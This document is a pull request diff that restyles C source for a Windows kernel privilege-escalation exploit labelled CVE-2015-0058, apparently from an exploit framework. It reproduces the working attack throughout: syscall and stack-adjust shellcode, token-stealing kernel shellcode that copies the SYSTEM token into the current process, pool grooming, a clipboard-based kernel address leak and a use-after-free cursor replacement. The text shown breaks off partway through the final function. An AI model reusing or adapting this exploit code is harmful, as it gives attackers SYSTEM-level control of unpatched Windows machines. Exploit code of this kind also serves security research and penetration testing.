### PR TITLE
Tidying up of code

### DIFF
--- a/external/source/exploits/cve-2015-0058/cve-2015-0058.sln
+++ b/external/source/exploits/cve-2015-0058/cve-2015-0058.sln
@@ -3,7 +3,7 @@ Microsoft Visual Studio Solution File, Format Version 12.00
 # Visual Studio 2013
 VisualStudioVersion = 12.0.21005.1
 MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2015-0058", "cve-2015-0058\cve-2015-0058.vcxproj", "{9A9975E4-66AA-4FA0-8099-1E1BA7D1BA2F}"
+Project("{3D110831-69E8-46D2-9C7B-7304BC4337CC}") = "cve-2015-0058", "cve-2015-0058\cve-2015-0058.vcxproj", "{9A9975E4-66AA-4FA0-8099-1E1BA7D1BA2F}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution

--- a/external/source/exploits/cve-2015-0058/cve-2015-0058.sln
+++ b/external/source/exploits/cve-2015-0058/cve-2015-0058.sln
@@ -3,24 +3,18 @@ Microsoft Visual Studio Solution File, Format Version 12.00
 # Visual Studio 2013
 VisualStudioVersion = 12.0.21005.1
 MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2015-0058", "cve-2015-0058\cve-2015-0058.vcxproj", "{E80F11CD-6698-492F-B4B0-1A2348A24BB0}"
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2015-0058", "cve-2015-0058\cve-2015-0058.vcxproj", "{9A9975E4-66AA-4FA0-8099-1E1BA7D1BA2F}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
 		Debug|x64 = Debug|x64
-		Release|Win32 = Release|Win32
 		Release|x64 = Release|x64
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.ActiveCfg = Debug|Win32
-		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.Build.0 = Debug|Win32
-		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.ActiveCfg = Debug|x64
-		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.Build.0 = Debug|x64
-		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.ActiveCfg = Release|Win32
-		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.Build.0 = Release|Win32
-		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.ActiveCfg = Release|x64
-		{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.Build.0 = Release|x64
+		{9A9975E4-66AA-4FA0-8099-1E1BA7D1BA2F}.Debug|x64.ActiveCfg = Debug|x64
+		{9A9975E4-66AA-4FA0-8099-1E1BA7D1BA2F}.Debug|x64.Build.0 = Debug|x64
+		{9A9975E4-66AA-4FA0-8099-1E1BA7D1BA2F}.Release|x64.ActiveCfg = Release|x64
+		{9A9975E4-66AA-4FA0-8099-1E1BA7D1BA2F}.Release|x64.Build.0 = Release|x64
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

--- a/external/source/exploits/cve-2015-0058/cve-2015-0058/LinkCursorPoc.h
+++ b/external/source/exploits/cve-2015-0058/cve-2015-0058/LinkCursorPoc.h
@@ -1,5 +1,3 @@
-typedef unsigned __int64 QWORD;
-
 typedef struct
 {
 	UINT	cbSize;
@@ -8,8 +6,8 @@ typedef struct
 	HWND	hwndTarget;
 	POINTS	ptsLocation;
 	DWORD	dwInstanceID;
-	QWORD	arbitraryFree;
-	QWORD   ulArguments;
+	ULONG_PTR	arbitraryFree;
+	ULONG_PTR   ulArguments;
 	UINT	cbExtraArgs;
 } EXTGESTUREINFO, *PEXTGESTUREINFO;
 
@@ -19,12 +17,12 @@ typedef struct
 	DWORD flags;
 	DWORD numEntries;
 	DWORD fill2;
-	QWORD fill3[7];
+	ULONG_PTR fill3[7];
 	DWORD fill4;
 	DWORD FunctionPtrLow;
 	DWORD FunctionPtrHigh;
 	DWORD fill5;
-	QWORD fill6[2];
+	ULONG_PTR fill6[2];
 	DWORD fill7;
 	DWORD PalEntriesPtrLow;
 	DWORD PalEntriesPtrHigh;
@@ -34,7 +32,8 @@ typedef struct
 } FAKEPALETTE, *PFAKEPALETTE;
 
 
-typedef struct _RTL_PROCESS_MODULE_INFORMATION {
+typedef struct _RTL_PROCESS_MODULE_INFORMATION
+{
 	HANDLE Section;
 	PVOID MappedBase;
 	PVOID ImageBase;
@@ -47,7 +46,8 @@ typedef struct _RTL_PROCESS_MODULE_INFORMATION {
 	UCHAR FullPathName[256];
 } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
 
-typedef struct _RTL_PROCESS_MODULES {
+typedef struct _RTL_PROCESS_MODULES
+{
 	ULONG NumberOfModules;
 	RTL_PROCESS_MODULE_INFORMATION Modules[1];
 } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
@@ -56,15 +56,14 @@ typedef  ULONG(WINAPI * xxxNtQuerySystemInformation)(ULONG, PVOID, ULONG, PULONG
 
 enum { SystemModuleInformation = 11 };
 
-#define SYSCALL_ARG(x) ((__int64)(x))
+#define SYSCALL_ARG(x) ((ULONG_PTR)(x))
 
-ULONG(*SystemCall)(__int64 Argument1, __int64 Argument2, __int64 Argument3, __int64 Argument4,
-	__int64 Argument5, __int64 Argument6, __int64 Argument7, __int64 Argument8);
+ULONG(*SystemCall)(ULONG_PTR arg1, ULONG_PTR arg2, ULONG_PTR arg3, ULONG_PTR arg4,
+	ULONG_PTR arg5, ULONG_PTR arg6, ULONG_PTR arg7, ULONG_PTR arg8);
 
-ULONG(*NtInjectGesture)(__int64 Argument1, __int64 Argument2, __int64 Argument3, __int64 Argument4,
-	__int64 Argument5, __int64 Argument6, __int64 Argument7, __int64 Argument8);
+ULONG(*NtInjectGesture)(ULONG_PTR arg1, ULONG_PTR arg2, ULONG_PTR arg3, ULONG_PTR arg4,
+	ULONG_PTR arg5, ULONG_PTR arg6, ULONG_PTR arg7, ULONG_PTR arg8);
 
 LRESULT CALLBACK GestureProc(HWND, UINT, WPARAM, LPARAM);
 
 ULONG InjectGesture(HWND hwnd, PEXTGESTUREINFO gestureInfo);
-

--- a/external/source/exploits/cve-2015-0058/cve-2015-0058/cve-2015-0058.c
+++ b/external/source/exploits/cve-2015-0058/cve-2015-0058/cve-2015-0058.c
@@ -24,20 +24,21 @@ typedef NTSTATUS *PNTSTATUS;
 #endif
 
 // payload info
-typedef struct {
-    LPVOID lpPayload;
-    DWORD offset;
+typedef struct
+{
+	LPVOID lpPayload;
+	DWORD dwOffset;
 } *PINFO;
 
 #ifdef DEBUGGING
 void dprintf(char* pszFormat, ...)
 {
-    char s_acBuf[2048];
-    va_list args;
-    va_start(args, pszFormat);
-    vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
-    OutputDebugString(s_acBuf);
-    va_end(args);
+	char s_acBuf[2048];
+	va_list args;
+	va_start(args, pszFormat);
+	vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
+	OutputDebugString(s_acBuf);
+	va_end(args);
 }
 #else
 #define dprintf(...)
@@ -45,89 +46,79 @@ void dprintf(char* pszFormat, ...)
 
 // syscall numbers
 
-#define __NR_NtUserLinkDpiCursor    0x138e
-#define __NR_NtUserDestroyCursor    0x109d
-#define __NR_NtUserInjectGesture    0x1385
-#define __NR_NtUserConvertMemHandle    0x10fe
-#define __NR_NtCreateTimer            0x0b1
-#define __NR_NtQueryIntervalProfile    0x132
-
+#define __NR_NtUserLinkDpiCursor 0x138e
+#define __NR_NtUserDestroyCursor 0x109d
+#define __NR_NtUserInjectGesture 0x1385
+#define __NR_NtUserConvertMemHandle 0x10fe
+#define __NR_NtCreateTimer 0x0b1
+#define __NR_NtQueryIntervalProfile 0x132
 
 /* Globals */
 
-BYTE SyscallCode[] = "\x4C\x8B\xD1"          // MOV R10, RCX
-                     "\xB8\x00\x00\x00\x00"  // MOV EAX,
-                     "\x0F\x05"              // SYSENTER
-                     "\xC3";                 // RET
+BYTE syscallCode[] =
+	"\x4C\x8B\xD1"          // MOV R10, RCX
+	"\xB8\x00\x00\x00\x00"  // MOV EAX,
+	"\x0F\x05"              // SYSENTER
+	"\xC3";                 // RET
 
-BYTE AdjustStack[] = "\x48\x83\xEC\x40"                          // sub rsp, 40h
-                     "\x49\xBA\xDE\xC0\xAD\xDE\xDE\xC0\xAD\xDE"  // mov r10, 0DEADC0DEh address of gestureInfo+38h
-                     "\x4C\x89\x54\x24\x20"                      // mov [rsp+20h], r10        
-                     "\x48\xB8\xDE\xC0\xAD\xDE\xDE\xC0\xAD\xDE"     // mov qword ptr rax, deadc0deh
-                     "\xFF\xD0"                                  // call rax
-                     "\x48\x83\xC4\x40"                          // add rsp, 40h
-                     "\xC3";                                     // ret
+BYTE adjustStackCode[] =
+	"\x48\x83\xEC\x40"                          // sub rsp, 40h
+	"\x49\xBA\xDE\xC0\xAD\xDE\xDE\xC0\xAD\xDE"  // mov r10, 0DEADC0DEh address of gestureInfo+38h
+	"\x4C\x89\x54\x24\x20"                      // mov [rsp+20h], r10
+	"\x48\xB8\xDE\xC0\xAD\xDE\xDE\xC0\xAD\xDE"  // mov qword ptr rax, deadc0deh
+	"\xFF\xD0"                                  // call rax
+	"\x48\x83\xC4\x40"                          // add rsp, 40h
+	"\xC3";                                     // ret
 
 // This slightly modified shellcode is taken from Sebastian Apelt's Pwn2Own Afd.sys 
 // privilege escalation write up, credit to him
 
-BYTE sc[] = "\x41\x51"                                  // push r9 save regs
-            "\x41\x52"                                  // push r10
-            "\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00"      // mov r9, gs:[0x188], get _ETHREAD from KPCR (PRCB @ 0x180 from KPCR, _ETHREAD @ 0x8 from PRCB)
-            "\x4D\x8B\x89\xB8\x00\x00\x00"              // mov r9, [r9+0xb8], get _EPROCESS from _ETHREAD
-            "\x4D\x89\xCA"                              // mov r10, r9 save current eprocess
-            "\x4D\x8B\x89\x40\x02\x00\x00"              // mov r9, [r9+0x240] $a, get blink
-            "\x49\x81\xE9\x38\x02\x00\x00"              // sub r9, 0x238 => _KPROCESS
-            "\x49\x83\xB9\xE0\x02\x00\x00\x04"          // cmp [r9+0x2e0], 4 is UniqueProcessId == 4?
-            "\x75\xe8"                                  // jnz $a no? then keep searching!
-            "\x4D\x8B\x89\x48\x03\x00\x00"              // mov r9, [r9+0x348] get token
-            "\x4D\x89\x8A\x48\x03\x00\x00"              // mov [r10+0x348], r9 replace our token with system token
-            "\x49\xB9\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA"  // mov r9, 0Ah  dynamic object address of freed palette
-            "\x49\xBA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA"  // mov r10, 0Ah dynamic object handle of freed palette
-            "\x4D\x89\x11"                              // mov [r9], r10 replace the wrong handle with the original object handle
-            "\x41\x83\x61\x08\x00"                      // and dword ptr [r9+8], 0 zero out the objects reference count
-            "\x41\x5A"                                  // pop r10 restore regs
-            "\x41\x59"                                  // pop r9
-            "\x48\x8B\x44\x24\x20"                      // mov rax, [rsp+0x20] repair stack
-            "\x48\x83\xC0\x3F"                          // add rax, 0x3f
-            "\x48\x83\xEC\x30"                          // sub rsp, 0x30
-            "\x48\x89\x04\x24"                          // mov [rsp], rax
-            "\xc3";                                     // ret resume
+BYTE privEscCode[] =
+	"\x41\x51"                                  // push r9 save regs
+	"\x41\x52"                                  // push r10
+	"\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00"      // mov r9, gs:[0x188], get _ETHREAD from KPCR (PRCB @ 0x180 from KPCR, _ETHREAD @ 0x8 from PRCB)
+	"\x4D\x8B\x89\xB8\x00\x00\x00"              // mov r9, [r9+0xb8], get _EPROCESS from _ETHREAD
+	"\x4D\x89\xCA"                              // mov r10, r9 save current eprocess
+	"\x4D\x8B\x89\x40\x02\x00\x00"              // mov r9, [r9+0x240] $a, get blink
+	"\x49\x81\xE9\x38\x02\x00\x00"              // sub r9, 0x238 => _KPROCESS
+	"\x49\x83\xB9\xE0\x02\x00\x00\x04"          // cmp [r9+0x2e0], 4 is UniqueProcessId == 4?
+	"\x75\xe8"                                  // jnz $a no? then keep searching!
+	"\x4D\x8B\x89\x48\x03\x00\x00"              // mov r9, [r9+0x348] get token
+	"\x4D\x89\x8A\x48\x03\x00\x00"              // mov [r10+0x348], r9 replace our token with system token
+	"\x49\xB9\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA"  // mov r9, 0Ah  dynamic object address of freed palette
+	"\x49\xBA\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA"  // mov r10, 0Ah dynamic object handle of freed palette
+	"\x4D\x89\x11"                              // mov [r9], r10 replace the wrong handle with the original object handle
+	"\x41\x83\x61\x08\x00"                      // and dword ptr [r9+8], 0 zero out the objects reference count
+	"\x41\x5A"                                  // pop r10 restore regs
+	"\x41\x59"                                  // pop r9
+	"\x48\x8B\x44\x24\x20"                      // mov rax, [rsp+0x20] repair stack
+	"\x48\x83\xC0\x3F"                          // add rax, 0x3f
+	"\x48\x83\xEC\x30"                          // sub rsp, 0x30
+	"\x48\x89\x04\x24"                          // mov [rsp], rax
+	"\xc3";                                     // ret resume
 
-PBYTE SyscallCodePtr = SyscallCode;
-PBYTE GestureCodePtr = AdjustStack;
+PBYTE syscallCodePtr = syscallCode;
+PBYTE gestureCodePtr = adjustStackCode;
 
-DWORD OldProtect;
-
-PLOGPALETTE logPal420;
-HPALETTE    palArray[32];
-HPALETTE    fillerPalettes[32];
+PLOGPALETTE pLogPal420;
+HPALETTE palArray[32];
+HPALETTE fillerPalettes[32];
 
 // Needed for window creation
-LRESULT CALLBACK GestureProc(HWND wnd, UINT msg, WPARAM wpar, LPARAM lpar) {
-    LRESULT res;
-
-    switch (msg) {
-    default:
-        res = DefWindowProc(wnd, msg, wpar, lpar);
-        break;
-    }
-
-    return res;
+LRESULT CALLBACK gesture_proc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
+{
+	return DefWindowProc(hWnd, uMsg, wParam, lParam);
 }
 
 // Used for system calls ( http://j00ru.vexillium.org/ )
-ULONG CallService(DWORD ServiceId, __int64 Argument1, __int64 Argument2, __int64 Argument3,
-    __int64 Argument4, __int64 Argument5, __int64 Argument6, __int64 Argument7,
-    __int64 Argument8) {
-    ULONG retval = 0;
+ULONG call_service(DWORD dwServiceId, ULONG_PTR arg1, ULONG_PTR arg2, ULONG_PTR arg3,
+	ULONG_PTR arg4, ULONG_PTR arg5, ULONG_PTR arg6, ULONG_PTR arg7,
+	ULONG_PTR arg8)
+{
+	memcpy(&syscallCode[4], &dwServiceId, sizeof(DWORD));
 
-    memcpy(&SyscallCode[4], &ServiceId, sizeof(DWORD));
-
-    retval = SystemCall(Argument1, Argument2, Argument3, Argument4,
-        Argument5, Argument6, Argument7, Argument8);
-
-    return retval;
+	return SystemCall(arg1, arg2, arg3, arg4,
+		arg5, arg6, arg7, arg8);
 }
 
 /* 
@@ -135,596 +126,483 @@ ULONG CallService(DWORD ServiceId, __int64 Argument1, __int64 Argument2, __int64
     of the same size in order to trigger a call to nt!ExDeferredFreePool which allows us to 
     replace the desired object
 */
-void FlushDeferredPool(void) {
-    ULONG i;
+void flush_deferred_pool()
+{
+	ULONG i;
 
-    for (i = 0; i < 32; i++) {
-        fillerPalettes[i] = CreatePalette(logPal420);
-    }
+	for (i = 0; i < 32; i++)
+	{
+		fillerPalettes[i] = CreatePalette(pLogPal420);
+	}
 
-    for (i = 0; i < 32; i++) {
-        DeleteObject(fillerPalettes[i]);
-    }
+	for (i = 0; i < 32; i++)
+	{
+		DeleteObject(fillerPalettes[i]);
+	}
 }
 
+// Wrapper around call_service which adjusts the stack and is used to replace the freed Cursor
+ULONG inject_gesture(HWND hwnd, PEXTGESTUREINFO pGestureInfo)
+{
+	ULONG_PTR pAddr = (ULONG_PTR)SystemCall;
+	ULONG i = 0;
+	DWORD dwServiceId = __NR_NtUserInjectGesture;
+	ULONG_PTR extra = (ULONG_PTR)(pGestureInfo + 1);
+	DWORD dwOldProtect;
 
-// Wrapper around CallService which adjusts the stack and is used to replace the freed Cursor
-ULONG InjectGesture(HWND hwnd, PEXTGESTUREINFO gestureInfo) {
-    QWORD addr = (QWORD)SystemCall;
-    ULONG i = 0;
-    DWORD ServiceId = __NR_NtUserInjectGesture;
-    QWORD extra = (QWORD)(gestureInfo + 1);
+	memcpy(&adjustStackCode[6], &extra, sizeof(ULONG_PTR));
+	memcpy(&adjustStackCode[21], &pAddr, sizeof(ULONG_PTR));
+	memcpy(&syscallCode[4], &dwServiceId, sizeof(DWORD));
 
-    memcpy(&AdjustStack[6], &extra, sizeof(QWORD));
-    memcpy(&AdjustStack[21], &addr, sizeof(QWORD));
-    memcpy(&SyscallCode[4], &ServiceId, sizeof(DWORD));
+	VirtualProtect(adjustStackCode, sizeof(adjustStackCode), PAGE_EXECUTE_READWRITE, &dwOldProtect);
 
-    VirtualProtect(AdjustStack, sizeof(AdjustStack), PAGE_EXECUTE_READWRITE, &OldProtect);
+	memcpy(&NtInjectGesture, &gestureCodePtr, sizeof(PVOID));
 
-    memcpy(&NtInjectGesture, &GestureCodePtr, sizeof(PVOID));
-
-    for (i = 0; i < 5; i++) {
-
-        NtInjectGesture(SYSCALL_ARG(hwnd),
-                        0,
-                        0,
-                        SYSCALL_ARG(gestureInfo),
-                        0,0,0,0);
-    }
-    return 0;
+	for (i = 0; i < 5; i++)
+	{
+		NtInjectGesture(SYSCALL_ARG(hwnd), 0, 0, SYSCALL_ARG(pGestureInfo), 0, 0, 0, 0);
+	}
+	return 0;
 }
 
-QWORD info_leak(void) {
+ULONG_PTR info_leak()
+{
+	const ULONG deterministic = 3;
+	const ULONG uMaxTries = 200;
 
-    HDC         hDC = NULL;
-    LOGPALETTE  logpal;
-    HPALETTE    hPal;
-    HBITMAP     hclipbm;
-    HBITMAP     hbm;
-    VOID **     ppvBits;
-    BOOL        opened = FALSE;
+	LOGPALETTE logpal;
+	ULONG_PTR pLastPalette = 0;
+	ULONG_PTR pTargetPalette = 0;
 
-    QWORD       palEntriesPtr   = 0;
-    QWORD       currentPalette  = 0;
-    QWORD       lastPalette     = 0;
-    QWORD       targetPalette   = 0;
+	ULONG i = 0;
+	ULONG uPalAllocs = 0;
+	ULONG uContiguousAllocs = 0;
+	ULONG uTryCount = 0;
 
-    QWORD *     leakingDib = NULL;
-    HANDLE      hHeap;
-    ULONG       i = 0;
-    ULONG       pal_allocs        = 0;
-    ULONG       contiguous_allocs = 0;
-    ULONG       deterministic     = 3;
-    ULONG       try_count         = 0;
-    ULONG       max_tries         = 200;
+	HANDLE hHeap = GetProcessHeap();
 
-    HPALETTE    htemp = NULL;
+	LPVOID* ppvBits = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x10);
 
-    hHeap = GetProcessHeap();
+	pLogPal420 = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x8900);
 
-    ppvBits = HeapAlloc(hHeap,
-                        HEAP_ZERO_MEMORY,
-                        0x10);
+	//pLogPal420->palNumEntries = 0xe5;
+	pLogPal420->palVersion = 0x0300;
+	pLogPal420->palNumEntries = 0x2300;
 
-    logPal420 = HeapAlloc(hHeap,
-                          HEAP_ZERO_MEMORY,
-                          0x8900);
+	logpal.palNumEntries = 1;
+	logpal.palVersion = 0x0300;
 
-    //logPal420->palNumEntries = 0xe5;
-    logPal420->palVersion = 0x0300;
-    logPal420->palNumEntries = 0x2300;
+	HPALETTE hTempPal = CreatePalette(pLogPal420);
+	DeleteObject(hTempPal);
 
-    logpal.palNumEntries = 1;
-    logpal.palVersion = 0x0300;
+	// A basic palette object is 0x98 + 4 * numEntries bytes in size, so in order to fit into
+	// the leaking dib which is 0x42c bytes big, we need 0xe5 entries ( 0x98 + 4 * 0xe5 = 0x42c)
+	pLogPal420->palNumEntries = 0xe5;
 
-    htemp = CreatePalette(logPal420);
-    DeleteObject(htemp);
+	do
+	{
+		HPALETTE hPal = CreatePalette(&logpal);
+		HBITMAP hClipBm = CreateCompatibleBitmap(NULL, 1, 1);
 
-    // A basic palette object is 0x98 + 4 * numEntries bytes in size, so in order to fit into
-    // the leaking dib which is 0x42c bytes big, we need 0xe5 entries ( 0x98 + 4 * 0xe5 = 0x42c)
-    logPal420->palNumEntries = 0xe5;
+		// Create the "special" bitmap
+		HBITMAP hBm = CreateBitmap(1, 1, 1, 5, ppvBits);
 
-    do {
+		if (!OpenClipboard(NULL))
+		{
+			return 0;
+		}
 
-        hPal = CreatePalette(&logpal);
+		EmptyClipboard();
 
-        hclipbm = CreateCompatibleBitmap(hDC, 1, 1);
+		SetClipboardData(CF_BITMAP, (HANDLE)hClipBm);
 
-        // Create the "special" bitmap
-        hbm = CreateBitmap(1,            // width
-                           1,            // height
-                           1,            // planes
-                           5,            // bitsPerPel
-                           ppvBits);
+		// Place the dummy DIB on the clipboard by closing it
+		CloseClipboard();
 
-        opened = OpenClipboard(NULL);
+		if (!OpenClipboard(NULL))
+		{
+			return 0;
+		}
 
-        if (opened != FALSE) {
-        }
-        else {
-            return 0;
-        }
+		SetClipboardData(CF_BITMAP, hBm);
 
-        EmptyClipboard();
+		SetClipboardData(CF_DIBV5, NULL);
 
-        SetClipboardData(CF_BITMAP, (HANDLE)hclipbm);
+		SetClipboardData(CF_PALETTE, hPal);
 
-        // Place the dummy DIB on the clipboard by closing it
-        CloseClipboard();
+		flush_deferred_pool();
 
-        opened = FALSE;
-        opened = OpenClipboard(NULL);
+		// Convert the bitmap to DIB and leak the uninitialized data
+		PULONG_PTR pLeakingDib = (PULONG_PTR)GetClipboardData(CF_DIB);
 
-        if (opened != FALSE) {
-        }
-        else {
-            return 0;
-        }
+		flush_deferred_pool();
 
-        SetClipboardData(CF_BITMAP, hbm);
+		// One of these palettes will later be freed
+		for (i = 0; i < 32; i++)
+		{
+			palArray[i] = CreatePalette(pLogPal420);
+		}
 
-        SetClipboardData(CF_DIBV5, NULL);
+		ULONG_PTR palEntriesPtr = *(pLeakingDib + 16); // palEntries pointer @0x80
+		ULONG_PTR currentPalette = *(pLeakingDib + 17); // this pointer @0x88
 
-        SetClipboardData(CF_PALETTE, hPal);
+		palEntriesPtr -= 0x90;
 
-        FlushDeferredPool();
+		/*
+			We can make sure that we have leaked a palette object by substracting 0x90 from
+			the palEntries pointer which then has to be equal to the this pointer
+		*/
+		if (palEntriesPtr == currentPalette)
+		{
+			uPalAllocs++;
 
-        // Convert the bitmap to DIB and leak the uninitialized data
-        leakingDib = (QWORD *)GetClipboardData(CF_DIB);
+			if (pLastPalette != 0)
+			{
+				if (pLastPalette == currentPalette)
+				{
+					uContiguousAllocs++;
 
-        FlushDeferredPool();
+					/*
+						If the same palette gets leaked 4 times in a row, the state is deterministic
+						and we can be certain that at the leaked address there will be a palette
+						object allocated
+					*/
+					if (uContiguousAllocs == deterministic)
+					{
+						pTargetPalette = currentPalette;
+						break;
+					}
+				}
+				else
+				{
+					pLastPalette = currentPalette;
+					uContiguousAllocs = 0;
+				}
 
-        // One of these palettes will later be freed
-        for (i = 0; i < 32; i++) {
-            palArray[i] = CreatePalette(logPal420);
-        }
+				/*
+					After 100 tries, check additionally if two or more palettes were allocated
+					this is manly to speed up the leaking process (even though the speed is not a
+					problem), because the allocations are not always that deterministic. This version
+					is a bit less "secure" but it still works reliably.
+					*/
+				if (uTryCount >= 100 && uPalAllocs >= 2)
+				{
+					pTargetPalette = currentPalette;
+					break;
+				}
+			}
+			else
+			{
+				pLastPalette = currentPalette;
+				uContiguousAllocs = 0;
+			}
+		}
+		else
+		{
+			pLastPalette = 0;
+			uContiguousAllocs = 0;
+			uPalAllocs = 0;
+		}
 
-        palEntriesPtr = *(leakingDib + 16);     // palEntries pointer @0x80
-        currentPalette = *(leakingDib + 17);    // this pointer @0x88
+		for (i = 0; i < 32; i++)
+		{
+			DeleteObject(palArray[i]);
+		}
 
-        palEntriesPtr -= 0x90;
+		CloseClipboard();
+		uTryCount++;
 
-        /*
-            We can make sure that we have leaked a palette object by substracting 0x90 from
-            the palEntries pointer which then has to be equal to the this pointer
-        */
-        if (palEntriesPtr == currentPalette) {
+	} while (uTryCount < uMaxTries);
 
-            pal_allocs++;
+	if (pTargetPalette != 0)
+	{
+		dprintf("[*] Tries needed: %d", uTryCount);
+	}
 
-            if (lastPalette != 0) {
-
-                if (lastPalette == currentPalette) {
-
-                    contiguous_allocs++;
-
-                    /* 
-                        If the same palette gets leaked 4 times in a row, the state is deterministic
-                        and we can be certain that at the leaked address there will be a palette
-                        object allocated
-                    */
-                    if (contiguous_allocs == deterministic) {
-
-                        targetPalette = currentPalette;
-                        break;
-                    }
-                }
-                else {
-
-                    lastPalette = currentPalette;
-                    contiguous_allocs = 0;
-                }
-
-                /*
-                    After 100 tries, check additionally if two or more palettes were allocated
-                    this is manly to speed up the leaking process (even though the speed is not a
-                    problem), because the allocations are not always that deterministic. This version
-                    is a bit less "secure" but it still works reliably.
-                */
-                if (try_count >= 100 && pal_allocs >= 2) {
-                    targetPalette = currentPalette;
-                    break;
-                }
-            }
-            else {
-
-                lastPalette = currentPalette;
-                contiguous_allocs = 0;
-            }
-        }
-        else {
-
-            lastPalette = 0;
-            contiguous_allocs = 0;
-            pal_allocs = 0;
-        }
-
-        for (i = 0; i < 32; i++) {
-            DeleteObject(palArray[i]);
-        }
-
-        CloseClipboard();
-        try_count++;
-
-    } while (try_count < max_tries);
-
-    if (targetPalette != 0) {
-        dprintf("[*] Tries needed: %d\n", try_count);
-    }
-
-    return targetPalette;
+	return pTargetPalette;
 }
-
 
 DWORD WINAPI execute_payload(LPVOID lpPayload)
 {
-    VOID(*lpCode)() = (VOID(*)())lpPayload;
-    lpCode();
-    return ERROR_SUCCESS;
+	VOID(*lpCode)() = (VOID(*)())lpPayload;
+	lpCode();
+	return ERROR_SUCCESS;
 }
 
+void link_and_destroy(LPVOID info)
+{
+	HANDLE hHeap = NULL;
+	HPALETTE hFreedPalette = NULL;
+	HINSTANCE hExe = NULL;
+	HCURSOR hCursorA = NULL;
+	HCURSOR hCursorB = NULL;
+	HANDLE timer = NULL;
+	ULONG hMem = 0;
 
-void link_and_destroy(LPVOID info) {
+	WNDCLASSEX wcx;
 
-    HDC        hDC           = NULL;
-    HANDLE     hHeap         = NULL;
-    HWND       hWnd          = NULL;
-    HPALETTE   freedPalette  = NULL;
-    HINSTANCE  hExe          = NULL;
-    HCURSOR    hCursorA      = NULL;
-    HCURSOR    hCursorB      = NULL;
-    HANDLE     timer         = NULL;
-    ULONG      hMem          = 0;
+	ULONG_PTR rop_gadget = 0;
 
-    WNDCLASSEX wcx;
 
-    QWORD ntArbAddReserved = 0;
-    QWORD rop_gadget = 0;
+	ULONG i = 0;
+	UINT c = 0;
+	UINT found = 0;
 
-    DWORD new_cr4 = 0x000406f8;
+	HMODULE hKernel = 0;
+	ULONG_PTR pHalDispatchTable = 0;
+	ULONG_PTR pDTableQueryInterval = 0;
+	DWORD dwOldProtect;
 
-    ULONG   i = 0;
-    UINT    c = 0;
-    UINT    found = 0;
-    BOOL    linked = FALSE;
+	ULONG_PTR pTargetPalette = 0;
 
-    HMODULE  KernelHandle               = 0;
-    QWORD    HalDispatchTable           = 0;
-    QWORD    HaliQuerySystemInformation = 0;
-    QWORD    kernelBase                 = 0;
-    QWORD    DTableQueryInterval        = 0;
+	RTL_PROCESS_MODULES moduleInfo;
 
-    QWORD targetPalette = 0;
+	BYTE andMask[] = { 0xFF, 0xFF, 0xFF, 0xFF };
+	BYTE xorMask[] = { 0xFF, 0xFF, 0xFF, 0xFF };
 
-    PBYTE            shellcode     = NULL;
-    PFAKEPALETTE     fakepalette   = NULL;
-    PEXTGESTUREINFO  gestureInfo   = NULL;
-    LPPALETTEENTRY   palentries    = NULL;
+	// info contains the payload address and the dwOffset
+	PINFO pInfo = (PINFO)info;
 
-    PINFO pInfo = NULL;
+	dprintf("[*] payload resides @ %llx", pInfo->lpPayload);
+	dprintf("[*] using dwOffset: %lx", pInfo->dwOffset);
 
-    PALETTEENTRY palentry;
+	hHeap = GetProcessHeap();
 
-    xxxNtQuerySystemInformation xxNtQuerySystemInformation = NULL;
+	LPPALETTEENTRY palEntries = (LPPALETTEENTRY)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x20);
 
-    RTL_PROCESS_MODULES ModuleInfo;
+	PFAKEPALETTE fakepalette = (PFAKEPALETTE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x42c);
 
-    BYTE AndMask[] = {
-        0xFF, 0xFF, 0xFF, 0xFF
-    };
+	// Set the flags that we can delete the freed palette later on (cleanup)
+	fakepalette->flags = 0x501;
+	// By setting numEntries to 0xe6 we can later distinguish between the normal palettes 
+	// and our fakepalette
+	fakepalette->numEntries = 0xe6;
 
-    BYTE XORMask[] = {
-        0xFF, 0xFF, 0xFF, 0xFF
-    };
+	PBYTE pShellcode = (BYTE *)VirtualAlloc((LPVOID)0x00000000dead0000, // max one DWORD long
+		0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 
-    // info contains the payload address and the offset
-    pInfo = (PINFO)info;
+	xxxNtQuerySystemInformation xxNtQuerySystemInformation = (xxxNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
 
-    dprintf("[*] payload resides @ %llx \n", pInfo->lpPayload);
